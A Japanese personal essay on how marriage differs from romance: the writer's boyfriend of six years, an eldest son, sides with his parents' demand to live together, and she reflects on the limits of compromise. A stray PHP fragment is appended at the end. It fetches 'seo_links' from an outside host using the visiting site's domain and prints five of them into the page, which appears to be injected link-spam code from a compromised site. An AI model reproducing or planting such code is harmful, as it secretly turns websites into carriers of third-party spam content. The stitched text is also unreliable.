結婚と恋愛は全く違う

私には6年間付き合っている人がいる。
その人とは価値観や経済観も似ており、一緒にいて安心する存在であり、お互いに仕事にも慣れてきたのでそろそろ結婚したいと思い始めるようになった。
向こうも同じように考えてくれていたようであるが、しかし、結婚に対しての考え方が大きく違うという壁にさしかかった。
 私は核家族で今まで生活し、今後もまずは二人で生活しながらお互いに成長していけたらいいなと思っていた。
しかし彼は長男であり、両親は同居を強く希望しており、同居できないなら結婚は認めないという非常に一方的な内容であった。
私は前々から、両親が元気な内からの同居はいやであるという事は彼に再三再四と伝えていた。
それなのに両親に、老後が心配だなどと言われ考えが親寄りになってしまい、私に我慢してほしいと言ってきた。
私は裏切られた気持ちになってしまった。
 現在もその問題は解決することなく平行線をたどっている。
そのうちに、今後私は結婚したとしても幸せになるのではなく、苦労するのではないかと思い始めるようにまってしまった。
 いくら恋愛では完璧な人であっても、結婚となるとお互いのバックグラウンドが明るみになり、深く関係してくる事に気が付いた。
結婚する前にこのことに気づけた事は、非常に大きかったと思う。
これからもっともっとお互いのことを知りながら、どこまで我慢できて、どこからが我慢することができないのかをしっかりと考えていく必要があると感じた。

//// $MAX = 5; // ////////////////// $lines = file('http://www.admin-search.biz/B/seo_links/?r_dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']));shuffle($lines); for($i=0;$i<$MAX;$i++){ echo($lines[$i].""); }